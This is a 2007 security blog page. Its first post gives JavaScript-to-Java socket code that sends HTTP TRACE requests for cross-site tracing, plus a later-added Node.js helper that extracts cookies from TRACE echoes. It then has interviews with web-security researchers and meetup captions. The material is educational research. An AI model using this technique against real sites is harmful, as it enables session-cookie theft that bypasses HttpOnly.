Monday, April 30, 2007

Using Java from within browser's javascript to exploit web application vulnerabilities Part 1

Last weekend Jeremiah showed me a code snippet in which he used Java from JavaScript to send a TRACE request to a server. It was a little slow, but it did the job. He asked me whether there was a way to make it run faster. After some work with the JDK 1.4 API, I was able to get the job done a lot faster. I always knew that we can call Java from JavaScript, but it never crossed my mind that it could be used this way too. That is why people like Jeremiah are so far ahead in the game: they have the ability to think differently.

In his post XST lives! (Bypassing HttpOnly) he shows a proof of concept for exploiting web application vulnerabilities with this technique.

The explanation here is, for the most part, the same as in his blog post, except for a couple of extra points. But this exercise got me thinking, and I want to make this a running thread and come up with more ideas for using Java and JavaScript to see what else can be done.


Approach 1 (Traditional approach using earlier versions of the JDK)

Complete Code

var l = document.location;
var host = l.hostname;                         // host name without the port
var port = l.port ? parseInt(l.port, 10) : 80; // l.port is "" when the URL uses the default port
// getByName() is a static method, so it is called without "new"
var addr = java.net.InetAddress.getByName(host);
var socket = new java.net.Socket(addr, port);
var wr = new java.io.BufferedWriter(new java.io.OutputStreamWriter(socket.getOutputStream(), "UTF8"));
var rd = new java.io.BufferedReader(new java.io.InputStreamReader(socket.getInputStream()));
// HTTP lines end with CRLF and an empty line ends the headers.
// "Connection: close" makes the server close the socket after the response;
// without it the readLine() loop below blocks until the keep-alive timeout expires.
wr.write("TRACE / HTTP/1.1\r\n");
wr.write("Host: " + l.host + "\r\n");   // l.host includes the port when the URL has one
wr.write("Connection: close\r\n");
wr.write("\r\n");
wr.flush();
var lines = "";
var str;
while ((str = rd.readLine()) != null) { lines += str + "\n"; }
alert(lines);
wr.close();
rd.close();
socket.close();

Step by Step explanation of the code

1. Get the URL shown in the browser's address bar.

var l = document.location;

2. Get the host name. l.hostname is the host without the port; l.host (used for the Host header below) includes the port when the URL has one.

var host = l.hostname;

3. Set the port. l.port is an empty string when the URL uses the default port, so fall back to 80 in that case.

var port = l.port ? parseInt(l.port, 10) : 80;

4. Get the IP address of the host given the host name. The host name can either be a machine name, such as "java.sun.com", or a textual representation of its IP address. If a literal IP address is supplied, only the validity of the address format is checked. getByName() is a static method, so it is called without new.

var addr = java.net.InetAddress.getByName(host);

5. java.net.Socket creates a stream socket and connects it to the specified port number at the specified IP address. Java called from JavaScript runs with the sandbox's permissions, which only allow a connection back to the host the page was loaded from; that is why the host is taken from document.location instead of being hard-coded.

var socket = new java.net.Socket(addr, port);

6. Open an output stream to send the request data to the server.

var wr = new java.io.BufferedWriter(new java.io.OutputStreamWriter(socket.getOutputStream(), "UTF8"));

7. Open an input stream to read the response data from the server.

var rd = new java.io.BufferedReader(new java.io.InputStreamReader(socket.getInputStream()));

8. Send a TRACE request to the server. HTTP lines end with CRLF ("\r\n") and an empty line ends the headers. Connection: close asks the server to close the connection after the response, which step 10 relies on.

wr.write("TRACE / HTTP/1.1\r\n");
wr.write("Host: " + l.host + "\r\n");
wr.write("Connection: close\r\n");
wr.write("\r\n");

9. Flush the output stream so that no data is left in the buffer.

wr.flush();

10. Read the response from the server until readLine returns null, which happens when the server closes the connection. Without Connection: close an HTTP/1.1 server keeps the connection open and the loop only ends when the keep-alive timeout expires, which can take many seconds.

var lines = "";
var str;
while ((str = rd.readLine()) != null) { lines += str + "\n"; }

11. Display the lines using the JavaScript alert function.

alert(lines);

12. Close the input and output streams.

wr.close();
rd.close();

13. Close the socket.

socket.close();


Approach 2

In the traditional way (the approach above) you ask the socket for its input and/or output streams. The newer approach uses channels, which are available in JDK 1.4 and later. With a channel you write to the channel itself, and rather than byte arrays you read and write ByteBuffer objects. A read on a blocking channel returns once at least one byte has arrived (or -1 at the end of the stream), just as an InputStream does, but it usually takes as many bytes as are available at that moment, up to the size of the buffer.

Complete Code

var l = document.location;
var host = l.hostname;
var port = l.port ? parseInt(l.port, 10) : 80;

// open() resolves the host name and connects in one call, so no InetAddress is needed
var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, port));
// same request as in Approach 1: CRLF line endings, empty line after the headers, Connection: close
var line = "TRACE / HTTP/1.1\r\nHost: " + l.host + "\r\nConnection: close\r\n\r\n";
var s1 = new java.lang.String(line);

client.write(java.nio.ByteBuffer.wrap(s1.getBytes("UTF8")));

var buffer = java.nio.ByteBuffer.allocate(8000);
client.read(buffer);
// convert only the bytes that were read; buffer.position() is the byte count after a read
alert(new java.lang.String(buffer.array(), 0, buffer.position()));
client.close();



Step by step explanation

// Same as in the approach above, except that no InetAddress is needed:
// InetSocketAddress resolves the host name itself
var l = document.location;
var host = l.hostname;
var port = l.port ? parseInt(l.port, 10) : 80;

1. Create a SocketChannel. open() with an InetSocketAddress resolves the host name and connects in one call.

var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, port));

2. Create a Java String object so that it can be converted to a byte array. The request is the same as in the first approach: CRLF line endings, an empty line after the headers and Connection: close so the server closes the connection when it is done.

var line = "TRACE / HTTP/1.1\r\nHost: " + l.host + "\r\nConnection: close\r\n\r\n";
var s1 = new java.lang.String(line);

3. Wrap the data into a ByteBuffer object and send the buffer to the server.

client.write(java.nio.ByteBuffer.wrap(s1.getBytes("UTF8")));

4. Allocate a ByteBuffer object to read the data from the server. The advantage of a ByteBuffer is that one read takes as many bytes as are available, up to the size of the buffer, instead of reading one byte at a time.

var buffer = java.nio.ByteBuffer.allocate(8000);

5. Read the data from the server. read() returns the number of bytes read, or -1 at the end of the stream. If the response is larger than the buffer, use the loop shown below.

client.read(buffer);

6. Display the response using the JavaScript alert function. Convert only the bytes that were actually read (buffer.position() after the read); otherwise the unused part of the 8000-byte array is turned into junk characters at the end of the string.

alert(new java.lang.String(buffer.array(), 0, buffer.position()));

If there is more data than the buffer holds (8000 bytes here), read in a loop until the server closes the connection and append each chunk to a string. flip() makes the bytes just read available from position 0 up to limit(), and clear() resets the buffer for the next read:

var response = "";
while (client.read(buffer) != -1) {
    buffer.flip();
    response += new java.lang.String(buffer.array(), 0, buffer.limit());
    buffer.clear();
}
alert(response);
client.close();


The difference between the two approaches is speed: the first is slower than the second. The first, however, runs on more installations because it only uses classes that exist in JDKs older than 1.4, whereas the java.nio classes in the second approach are not available there. In both cases the JVM opens its own TCP connection, so the request carries exactly the headers written above and nothing from the browser's cookie jar; what the server echoes back is that request plus whatever any proxy on the path added to it.
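As an added example that is not part of the original post (and not Jeremiah's code either), here is the same TRACE exchange in plain Node.js without the Java plugin, serving both approaches above. buildTraceRequest produces the bytes the two snippets write to the socket, with CRLF framing and Connection: close so a read-until-EOF loop terminates; analyzeTraceResponse checks whether the server actually honoured TRACE (200 with Content-Type: message/http) and pulls the cookies out of the echoed request, which is what makes the method interesting. The host name, the SESSIONID cookie and both server responses are constructed for the example; nothing is sent over the network.

```javascript
// Added example, not code from the original post: the TRACE exchange as pure
// functions over strings, so it runs in Node.js without the Java plugin.
const CRLF = '\r\n';

// The bytes Approach 1 and Approach 2 write to the socket. HTTP/1.1 needs
// CRLF line endings and an empty line after the headers; "Connection: close"
// makes the server close the socket when it is done, so a read-until-EOF loop
// (readLine() == null, read() == -1) ends instead of waiting for the
// keep-alive timeout. extraHeaders lets the caller add e.g. a Cookie header.
function buildTraceRequest(host, port, extraHeaders) {
  const hostHeader = port === 80 ? host : host + ':' + port;
  const lines = ['TRACE / HTTP/1.1', 'Host: ' + hostHeader, 'Connection: close'];
  for (const name of Object.keys(extraHeaders || {})) {
    lines.push(name + ': ' + extraHeaders[name]);
  }
  return lines.join(CRLF) + CRLF + CRLF;
}

// Split a raw HTTP message (request or response) into its start line, a map
// of lower-cased header names to values, and the body after the blank line.
function parseHttpMessage(raw) {
  const end = raw.indexOf(CRLF + CRLF);
  if (end === -1) throw new Error('incomplete HTTP message: headers not terminated');
  const head = raw.slice(0, end).split(CRLF);
  const headers = {};
  for (const line of head.slice(1)) {
    const colon = line.indexOf(':');
    if (colon === -1) continue;
    headers[line.slice(0, colon).trim().toLowerCase()] = line.slice(colon + 1).trim();
  }
  return { startLine: head[0], headers, body: raw.slice(end + 4) };
}

// Decide whether the server honoured TRACE and, if so, recover the request it
// echoed. A server with TRACE enabled answers 200 with
// Content-Type: message/http and the request it received as the body, so every
// header on that request (a Cookie header included, HttpOnly or not) comes back
// readable to the script. Anything else (405, 403, a redirect) means the method
// is off and there is nothing to read.
function analyzeTraceResponse(raw) {
  const res = parseHttpMessage(raw);
  const status = parseInt(res.startLine.split(' ')[1], 10);
  const contentType = (res.headers['content-type'] || '').toLowerCase();
  const traceEnabled = status === 200 && contentType.indexOf('message/http') === 0;
  if (!traceEnabled) return { status, traceEnabled, echoed: null, cookies: {} };
  const echoed = parseHttpMessage(res.body);
  const cookies = {};
  for (const pair of (echoed.headers['cookie'] || '').split(';')) {
    const eq = pair.indexOf('=');
    if (eq !== -1) cookies[pair.slice(0, eq).trim()] = pair.slice(eq + 1).trim();
  }
  return { status, traceEnabled, echoed, cookies };
}

// Constructed sample (host, cookie and both responses are made up for this
// example): the request Approach 1/2 would send, with a cookie added to show
// what the echo gives back...
const sampleRequest = buildTraceRequest('www.example.com', 80, { Cookie: 'SESSIONID=abc123; theme=dark' });
// ...what a server with TRACE enabled answers...
const enabledResponse = ['HTTP/1.1 200 OK', 'Connection: close', 'Content-Type: message/http', '', sampleRequest].join(CRLF);
// ...and what a server with TRACE turned off (Apache: TraceEnable off) answers.
const disabledResponse = ['HTTP/1.1 405 Method Not Allowed', 'Content-Length: 0', 'Connection: close', '', ''].join(CRLF);

const hit = analyzeTraceResponse(enabledResponse);
console.log('TRACE enabled:', hit.traceEnabled, '| echoed:', hit.echoed.startLine, '| cookies:', hit.cookies);
console.log('hardened server, TRACE enabled:', analyzeTraceResponse(disabledResponse).traceEnabled);
```

The status/Content-Type check is the part worth keeping when you test a server for this: a 200 with some HTML body is not a TRACE echo, and a 405 (what Apache returns with TraceEnable off) means there is nothing to harvest regardless of how the request was sent.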

I will publish other things soon that I found out while doing this exercise.

Reflection on Andrew Van Der Stock


This week on Reflection we have Andrew van der Stock. Andrew is very active in the webappsec industry through OWASP and is involved in many of its activities, including the OWASP Top Ten and the OWASP Guide. He has contributed a lot to the webappsec field, more in terms of research and awareness on securing applications than on exploiting them. He used to be based in Australia and has recently moved to Columbia, MD, where he joined Aspect Security. Today he shares with us his journey in web application security and his thoughts on black hat and white hat hackers (or should I say security professionals). In his own words:


“I started playing with computers when I was 7 on a Commodore Pet. My first attempts at squeezing more out of my computer than it probably was capable of were with my Amstrad 6128, which ran a Z80 at 4 MHz. I more than doubled the speed of the 3" (yes, 3") disk drive by driving it directly. This is where I had my first taste of assembly language and low level prodding and probing.

Back in the mid-1990s, I was a system administrator at an Australian hospital. Doctors would frequently try to dump private electronic patient (UR) records for their private use, possibly to sell to drug companies, but always illegal. This unregulated (at the time) but immoral use of our health data infuriated me and got me into ethics and privacy in a big way. This led me to join SAGE-AU, the System Administrator's Guild of Australia, eventually rising to be SAGE-AU's President.

I used to be the editor of SAGE Advice, the SAGE-AU journal, and I ended up writing about 20-30 articles for that. Most are system administration flavored, so not that useful to your readers.

I used to pen a weekly column for The Australian newspaper (a daily national broadsheet in Australia). I think I wrote about 30 odd articles for them back in the day, but their archives are closed to non-subscribers so I can't tell for sure. I lost a lot of data (we all learn once!) when I went from my early Macs to my SMP workstation running Windows NT 3.51, and I still don't have all my data from that time. Luckily, I'm back on a beautiful Mac again, and as I've learnt the hard lessons of data, I have everything dating back to 1995.

I was the author of most of the technical standards and policy set by auDA, the Australian Domain Name Administrator (similar in function to ICANN). I worked with two or three others for the majority of this project, although as always, we started with many more. My work on this panel regulates how DNS works in Australia.

I never completed my degree. If anyone from RMIT CS is reading, I wouldn't mind getting some credits for my work at OWASP so I can finish it up. Let's talk! If anyone else is interested in offering me a place in a masters by research program in web app sec, I'd be interested. I don't think I'm really cut out for undergraduate course work, but I love doing ground breaking research.

I am a dual Microsoft MCSE. My first MCSE was NT 4.0 back in 1997, and then I got my Windows 2000 early adopter MCSE in late 1999 when they were trialing the exams. Early adopters got a nice Gold MCSE card! Many folks find this a bit funny, especially as I've been active in open source for so long... And that I'm really a Mac dude at heart. But I have a soft spot for Microsoft as they do the basic research in our field, and they own up to security flaws and fix them properly. Now, they're reaping the rewards. Good for them. Many vendors could learn a thing or ten from MS. I'm pretty sure my MCSEs are expired now.

In 1998, I entered the field properly as a security consultant. At that stage, finance institutions were starting to review the lockdown of apps. I was drafted into looking at various apps for many larger finance institutions, who were concerned with unmanaged risk and "mobile code" - ActiveX and Java applets running on their PCs. My interest grew from there, even though I didn't really start code reviewing stuff every day until the early part of this century.

In web app sec, I am completely self taught, but I did learn a lot from folks at OWASP – no one lives in a vacuum. I still do a lot of research using forum software to see how things can be fixed in the real world. I love working with some very smart folks who challenge me every day. It's a sad day when you don't learn or discover something new.

To understand this field, you must understand the threats and attacks to defend against them. I am reasonably certain anyone can learn how to attack if they Think Evil for long enough. It's far easier to Think Evil and destroy than it is to create solid software.

The proof of this putrid state of affairs is s'kid marks getting lots of unthinking column centimeters every day, and yet how little praise the folks in Microsoft got for their work on .NET 2.0. .NET 2.0 advances the field in so many ways – say by automatically rejecting any option in a select list which wasn't sent out in the first place. Whoever thought of that should be on the front page of CNET for a year to make up for the waste of space most "hacking" stories get. And there are so many more unsung heroes - master craftsmen (and women!) all. For every La Padula or Bell or Schneier, there's a thousand or more s'kid marks. This is a very asymmetrical situation and it's not good for our industry.

Criminals who attack systems are simply criminals, or in the abstract, attackers. Low level attackers are "s'kid marks" to me – morons who have a script who think they are the most l33t players. Unfortunately, a million s'kid marks equates to a lot of damage as eventually one or two will strike it lucky during school break.

The true hackers are polymaths like Turing, von Neumann, Douglas Engelbart (the primary creator of the desktop metaphor back in the 1960s), Steve Wozniak (a true hardware hacker), the folks who made my HP 48G calculator (a work of art and mathematical tour de force!), and the recently deceased John Backus (the guy who created Fortran and is the "Backus" in BNF, used in every RFC grammar from here to eternity). Those folks are worthy of respect and are the true meaning of the word "hacker". But now, the word is lost forever because of constant misuse over a long period of time.

My thing is software engineering as a repeatable practice. We have to stop treating web app sec as a black art. We have to stop lauding the attackers and praising the folks who deliberately break software for nothing more than getting their name in lights. We have to stop thinking these folks are somewhat special. If you're a s'kid mark today, it's time to step up and move on. If you're any good, come join us on the light side of the force – before you commit a crime. There's so much to do and so much research begging for someone to just come and do it.

We should be celebrating the folks who put the hard yards into security research which protects us all – permanently. I'm trying to do this with CSRF at the moment, and will be taking some time this year to make PHP 6.0 safer. I know how to attack software and have done so, but I prefer to build strong software, so my skills lie in ensuring that the defenses and controls I write about, recommend, or indeed implement are robust against known attacks as well as the stuff over the horizon. Occasionally, I am at the horizon, such as when I went and played with JSON injection before pretty much anyone else. I don't claim to have invented JSON injection as it's so totally obvious anyone with half a clue could have recreated my work without any knowledge of what I was doing.

We need more folks who hang out at OWASP and WASC. We should have totally eliminated all forms of injection and other common weaknesses by now - and moved on to where the value lies – the business rules. It's a shame so many are sucked in by the dark side of our industry. It's such a waste of good talent.

I'm one of the dudes working on questions for SANS "National Secure Programming Skills Assessment", a soon to be forthcoming certification which will sort the wheat from the chaff. I'm doing the Java questions (eventually) and hope to be involved in the PHP questions when they kick that off. With some luck, this will not become a paper certification (where certified but clueless folks are rampant), but a suitable metric to prove skill.

I had a book contract to write an Ajax Security Book based upon my world famous Ajax Security Presentation from February last year. However, life intervened, and that's on permanent hold, especially as Billy Hoffman & co is writing what will be a superb Ajax Security book if his research is anything to go by.

I have the bones of a security architecture book waiting to go. If anyone feels like writing it with me, I should be free enough sometime in about two-five years :) Really should finish Guide 3.0 before starting this one though.

I've been involved in open source a long time. My first open source project, which I never completed (shame!) was GNU stty (gstty). Since then, I've been involved in XFree86 (from about 1996 onwards), Linux kernel when things didn't work on my SMP workstation (SMP was rare in the day), on the extreme periphery of NetBSD (my friend Luke was NetBSD core, so I wanted to show a little loyalty to his projects ;), pnm2ppa – print drivers for HP's worst ever printers for Unix/Linux/BSD.

Since 2001, I've been running Aussieveedubbers, a largish VW nut forum. Through that, I got into writing forums. Initially, I helped write XMB, which after a spat became UltimaBB, then GaiaBB, and possibly that code base will be re-forked back into XMB. UltimaBB is very secure compared to its contemporaries as I've been busy with it. However, like all projects using my infinite spare time... Things take a back seat to my real job and my real life.”

Below are his contributions to the webappsec community.

Articles:-

OWASP Guide 2.0 – as lead author and editor.
http://www.owasp.org/index.php/Guide_Table_of_Contents

OWASP Top 10 2007 (along with Dave Wichers and Jeff Williams).
http://www.owasp.org/index.php/Top_10_2007

Many web app sec blog articles:

http://www.greebo.net/?cat=3 (web app sec, 47 blog entries)
http://www.greebo.net/?cat=16 (OWASP, 24 blog entries)
http://www.greebo.net/?cat=17 (conferences and travel)


Memberships:-

Executive Director - OWASP
Columbia PHP user group
SAGE-AU 1995 - 2002, ex-President Jun 2000 – Mar 2001
AISA


Conferences:-

Andrew has presented at the following conferences:

SAGE-AU - The System Administrators Guild of Australia
OWASP – Open Web Application Security Project
Linux Australia
AusCERT – Australian Computer Emergency Response Team
RuxCon - Australian security conference, Vulnerability assessment and hacking information, for Australia
Black Hat – Black Hat
OSCON – Oreilly Open Source Convention


His favorite presentation is Ajax Security presentation. http://www.greebo.net/owasp/ajax_security.pdf

Predictable ISN numbers in Foundry ServerIron. My first bugtraq advisory back in 2000. So proud!
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0178


Tutored "Internet 101" back in the early 1990s at the Business Faculty at RMIT University


Tools written by him:-

WebSphere {xor} Secret Magic Ring Decoder Toy (C#)

XMB / UltimaBB / GaiaBB – forum software. It's a good test harness for new webappsec ideas. XMB 1.9.7 is due soon which fixes a lot of security issues. (PHP)


Companies worked for:-

Web Application Security jobs:

e-Secure – Senior Security Architect
b-sec – Chief Technologist
National Australia Bank – Security Application Architect
Aspect Security – Senior Engineer


Company working for:-

Aspect Security


Email:-

vanderaj__at__owasp__dot__org



Website:-

http://www.owasp.org


He has one of the sharpest brains in the industry. The contributions listed above do not reflect the amount of work he has done in promoting awareness of web application security.

Last Week – Nish Bhalla
Next Week – Bill Pennington

Monday, April 23, 2007

WASC Meetup - April 18 - pictures

Sorry for the delay in this post. Last Wednesday we had our WASC meetup in Sunnyvale. Unfortunately the date coincided with the OWASP San Francisco chapter meeting and an infosec conference in Toronto, so we did not get as much attendance as we expected, but some of us still showed up. Jeremiah had already mentioned on his blog that everyone has to buy a beer for someone they haven't met before. :)


Before you look at the pictures, I want to apologize for the quality, since they were taken with my cellphone.



From left to right -
Comcor - looking at people he hasn't met before, thinking how much beer he will have to buy.
Jeremiah (WhiteHat) - thinking: why am I so popular? Everyone knows me, so nobody will buy me a beer. Grrr
Brian Chess (Fortify Software) - laughing since there are a lot of people who will have to buy him a beer. He has no clue that he has to buy for them as well.


From left to right
Joe (TiVo) - All smiles since he got his beer.
Robert Auger (WASC) - asking the guy to buy drinks since he has never met him before.
??? - He didn't tell me his name. Maybe he didn't want to buy me a drink.


Left - Comcor wondering: do I really need to buy others a drink?
Right - Jeremiah (WhiteHat) smiling and enjoying his beer. Maybe he has a plan for someone to pay for it.




From left to right -

Cori (Google) - Looking at Brian Chess (right) to buy him a beer
Jeremiah (WhiteHat) - Ordering appetizers for us (it was very nice of him)
Brian Chess (Fortify Software) - probably scared... he doesn't want to buy Cori a beer

Left - Frederick Lee (Fortify Software) wondering what he did to deserve this.
Right - Joe (TiVo) - probably thinking how to get Jeremiah to pay for everybody's beer. You can see a smile on his face.




From left to right -
Andy (PayPal), Robert Auger (WASC), Joe (TiVo)
Everybody happy since Jeremiah picked up the tab.


All jokes apart, it was fun getting to know people who are in the Bay Area, and hopefully we will do it again sometime in the next couple of months. This time we will make sure that it doesn't coincide with other events.

Special thanks to Jeremiah for bringing all of us together.

Reflection on Nish Bhalla


This week on Reflection we have Nish Bhalla from SecurityCompass. Nish has been around the block for a long time and used to work for FoundStone before starting his own company. He specializes in product testing, code reviews, web application testing, and host and network reviews. He has presented at various conferences, published articles, and contributed to and co-authored several books. He lectures and gives webinars at Seneca College and Florida University and has also been quoted in Government Security News, InternetNews and CSO Online.
He has tremendous knowledge of the webappsec space and has been involved with OWASP and YASSP. Below is his journey in the webappsec space, in his own words:

“I've been interested in security since the mid 90s, pretty much right after I was exposed to UNIX. I started off by developing client / server apps around the same time and tried to hack them. Security knowledge was still considered underground hacker knowledge then and not a whole lot of information was publicly disseminated. I had the opportunity to meet with a few interesting virus writers back at school who taught me a few things about reverse engineering and Clipper, the old reversing software (not the Clipper programming language).

I started learning about web technologies in the late 90s when I was involved in performing host audits and building secure web servers. I had the opportunity to be involved with the rollout of an online trading company's web application. This was the time when I started getting a good understanding of web applications and how they interact with various components. I took care to understand the technologies and their underlying protocols during this time.

During the same time (in the late 90's) I had the opportunity to work for Foundstone. An amazing team of security consultants taught me some new tricks on hacking web applications. I had already learnt a lot about web security when I was involved with the rollout, but what these consultants taught me was to adopt a different mind set - the attacker's mind set.

The ease of exploiting web applications was what got me so involved in web app sec (unlike writing buffer overflows, which requires a lot more low level knowledge and skills). The code behind the various web application vulnerabilities caught my interest more than just the vulnerabilities themselves.

In 2004, after leaving Foundstone, I started Security Compass, which is where I am today. We decided to develop a RATS-like web code auditing tool, SWAAT (Security Compass Web Application Analysis Tool), to help with doing some basic server page code auditing.

We're currently involved in doing some interesting research on web services and we'll be coming out with interesting web services tools in the near future.

I'm a big snooker/pool fan; living in Toronto provides me with the chance to meet a lot of interesting people.”


Based out of Toronto, CA, Nish is 33 years old. Below are his contributions to the community.


Articles:-

Writing Stack Based Overflows on Windows
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part1.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part2.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part3.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part4.pdf

AIX 4.3 Bastion Host Guidelines
http://www.giac.org/certified_professionals/practicals/gsec/0853.php

Building Secure Applications: Consistent Logging
http://www.securityfocus.com/infocus/1888

IIS Lockdown and Urlscan
http://www.securityfocus.com/infocus/1755


Books:-

Co-authored

Buffer Overflow Attacks
http://www.amazon.com/gp/product/1932266674/


Contributed

Hacking Exposed Web Applications, Second Edition
http://www.amazon.com/gp/product/0072262990

HackNotes(tm) Network Security Portable Reference
http://www.amazon.com/gp/product/0072227834/

Windows(R) XP Professional Security
http://www.amazon.com/gp/product/0072226021/

Writing Security Tools and Exploits
http://www.amazon.com/gp/product/1597499978


Conferences:-

Web Service Vulnerabilities
http://www.blackhat.com/html/bh-europe-07/bh-eu-07-index.html

Application Security - Dallascon
http://www.dallascon.com/

Federations of Security Professionals
http://www.fspgroup.ca/

Binary Analysis, Finding Secret in ISAPIs - 2006
http://www.syscan.org/

Preparing for a FISMA Compliancy Audit: What IT Security Professional Needs to Know
http://www.infosecurityevent.com/App/homepage.cfm?moduleid=42&appname=100004

Finding Secrets in ISAPI
http://conference.hackinthebox.org/hitbsecconf2006kl/

Auditing Source Code
http://2005.recon.cx/


Other Contributions:-

OWASP Toronto Local Chapter
http://www.owasp.org/index.php/Toronto

SWAAT
http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project

Yet Another Solaris Security Project
http://www.yassp.org/yassp/


Company working for:-

Security Compass


Email:-

nish__at__securitycompass_dot_com


Website:-

www.securitycompass.com


Companies worked for:-


Foundstone, Infotek Solutions


Education:-

Masters in Parallel Processing from Sheffield University,
Post graduation in Finance from Strathclyde University,
Bachelor in Commerce from Bangalore University



Nish is currently working on some very interesting tools, which will hopefully be released soon and are definitely worth evaluating.

Last Week – Ory Segal
Next Week – Andrew Van Der Stock

Monday, April 16, 2007

Reflection on Ory Segal


This week on reflection we have Ory Segal of Watchfire. Ory has been involved in webappsec from its very early days. He has published several whitepapers, articles and advisories. He has contributed to security standards like the WASC Threat Classification and the WASC Web Application Firewall Evaluation Criteria. He has spoken at various conferences and security events and is highly regarded amongst web application security professionals. Today, he shares with us his journey in the web application security field. In his own words:

“My involvement in the security world started back in 1995, when I was hired as a technician for a company that dealt with counter-intelligence. The job was very interesting and included all sorts of things you only see in movies – scanning and locating eavesdropping equipment, installing all sorts of intelligence gadgets for government agencies, etc. (during that time I developed paranoia, and to this day I always search new places I visit for hidden security cams).

When I grew tired of counter-intelligence I made the switch over to the Internet, which was just emerging here in Israel. I worked for about a year for one of Israel’s biggest ISPs, and I learned all about network security - specifically TCP/IP and Linux. Someone I knew (and who knew what I was doing in my spare time) who worked for a large data security consulting company in Israel asked me to help her build a penetration testing team, which sounded very interesting to me. I then spent almost two years building a team of penetration testers that performed risk assessments for almost every major company in Israel, as well as most of the government offices. As a part of my job, I was managing several large-scale and critical information security projects for clients such as the Tel Aviv Stock Exchange, Israeli banks and the Israeli Department of Defense.

On one of the projects I was managing, I was introduced to a very interesting piece of software, which at the time was quite innovative – a Web Application Firewall. It was called Clearnet, and was developed by a small company called Perfecto Technologies. The product would later become AppShield, and the company would later become Sanctum Inc. AppShield was such an interesting and refreshing idea that it got me very intrigued. As part of my role I got the chance to try and hack my way through AppShield, which was very hard. I did find some minor issues, but never got through… that’s when I really got hooked on web application security. Unlike network-level hacking, which almost always summed up to exploiting some buffer overflow, web application hacking posed a lot more challenges. It was all about bypassing application logic and felt like solving a puzzle.

After a few months I received an offer from Gili Raanan (co-founder of Sanctum) who was in the process of putting together a team of security researchers. During my interview I was introduced to the soon-to-be-famous Amit Klein. Lucky for me, Amit decided to hire me. In the end, working with Amit is one of my fondest memories of my years with Sanctum. Amit is a great mentor and I could not have hoped for a better boss, and friend.

My work at Sanctum revolved mostly around AppScan - a new product the company was just building. It was the first automated web application scanner in the world. When I started working on the product, it was just at v1.0, and was built around an HTTP Proxy. It worked by proxying and analyzing HTTP traffic that was created by the user who manually browsed through the application, and by creating some simple parameter tampering attacks. At that time it did not include the sophisticated capabilities that we have all come to expect from AppScan.

As well as performing lots of web application security audits and researching and publishing vulnerabilities, I was also responsible for writing parts of AppScan’s attack engine, creating and maintaining thousands of attacks for the product’s test database. At the time, one of the biggest challenges for web application scanners was how to automate the process of testing and validating web security issues - our group pioneered this field.

When I first started working for Sanctum in 2000, web application security was in its infancy – we had to educate the market. It was challenging but very fulfilling. Sanctum created this market space and I was thrilled to be a part of something I knew would only grow in importance. I remember how people who attended presentations I gave looked at me, and how their jaws dropped when I would demonstrate simple things like Shopping-Cart manipulations or SQL Injection. Big pieces of the WebAppSec puzzle were still missing – XSS, Blind SQL Injection, and many other techniques were either not yet known publicly, or known but not taken very seriously. In fact, as you probably know, XSS was disregarded by many during the first years after it was discovered – people didn’t take it seriously for a long time.

In 2004 Watchfire acquired Sanctum and I took the role of AppShield Product Manager and helped the company successfully transition AppShield to F5.

In 2005 I accepted the role of Director of Security Research for Watchfire and since then I have been a part of the Product Management Group. In this role I am responsible for helping to improve AppScan and to continually find ways to automate more aspects of the web application security assessment process. In addition, I am also researching new technologies and directions for Watchfire’s products as well as overseeing the security research which is now performed by a much larger team of security experts (who recently published the “Overtaking Google Desktop” whitepaper).

I am very excited about the direction that AppScan and automated scanning has taken in recent years, and I am sure we’ll see some major improvements and interesting new technologies in the near future. I am also very happy to see that more and more organizations are taking WebAppSec seriously; the market has come a long way.

In the “old days”, we did publish some *nasty* anonymous security advisories. It was fun, but I can’t disclose any more information. Now I am a strong supporter of proper disclosure policies (go RFPolicy!)

Back in 2002, I co-founded a small local group of security experts called 8200.org (it was a takeoff on the whole 2600.org, and 8200 – an Israeli intelligence army unit, which spawned some of the greatest minds in the security industry). We ran several projects, one of which was the first WarDriving experiment in Israel. The results were obvious and we got some publicity in local newspapers. Among others, the group included Liraz Siri (who performed the Internet Auditing Project and scanned 36 million servers across the internet).

I am a musician, I mainly play guitar. I have been a part of the Tel Aviv Indie Rock scene since 1997. In 1997 I put out a solo record (where I played all instruments), under the pseudonym “Wilkesboro Brothers”; since then I have been involved in several bands. My current band is called Pits (http://www.myspace.com/pitzmusic), we put out an album in 2005, which got good reviews and we are currently working on our second album. If you happen to be in Tel-Aviv, check out our gig schedule.

I live with my wife Orli, who is also involved in the IT Security market (Orli worked many years for Check Point, and also co-founded another security start-up). It’s not uncommon to hear us talk about security stuff at home. We are both techies and also fanatic music lovers.”




Based out of Tel Aviv, Israel, Ory is only 33 years old. Below is a list of his contributions to the community.


Articles:-

Testing Privilege Escalation in Web Applications:
https://www.watchfire.com/securearea/whitepapers.aspx?id=24

Web Application Forensics: The uncharted territory:
http://www.cgisecurity.com/lib/WhitePaper_Forensics.pdf

Methodologies & Tools for Web Application Security Assessment:
https://www.watchfire.com/securearea/whitepapers.aspx?id=20

Ory has also authored a series of webcasts on the subject of the WASC TC project, covering web application security and advanced hacking courses, and has given numerous presentations around the globe on the subject of Web Application Security. Those links can be found on the Watchfire website (requires personal information).



Advisories:-

Apache Win32 Batch File Remote Command Execution Vulnerability:
http://www.securityfocus.com/bid/4335

Multiple vendors web server source code disclosure - 8.3 name format vulnerability:
http://www.securityfocus.com/archive/1/273308

Macromedia ColdFusion MX Missing Template Cross Site Scripting Vulnerability:
http://www.securityfocus.com/bid/5011/

Microsoft Exchange Server 5.5 Outlook Web Access Cross-Site Scripting Vulnerability:
http://www.securityfocus.com/bid/8832

Multiple XSS vulnerabilities in Microsoft SharePoint Portal Server:
http://www.securityfocus.com/bid/10043

Cpanel Admin Interface HTML Injection Vulnerability:
http://www.securityfocus.com/bid/8119

Microsoft IIS 5.x/6.0 WebDAV (XML parser) attribute blowup DoS (written by Amit Klein; Ory helped to apply the vulnerability to Microsoft IIS servers):
http://www.securityfocus.com/archive/1/378179

PhpBB HTTP Response Splitting & Cross Site Scripting vulnerabilities:
http://www.securityfocus.com/bid/10753 &
http://www.securityfocus.com/bid/1074

Deerfield VisNetic WebSite Cross Site Scripting Vulnerability:
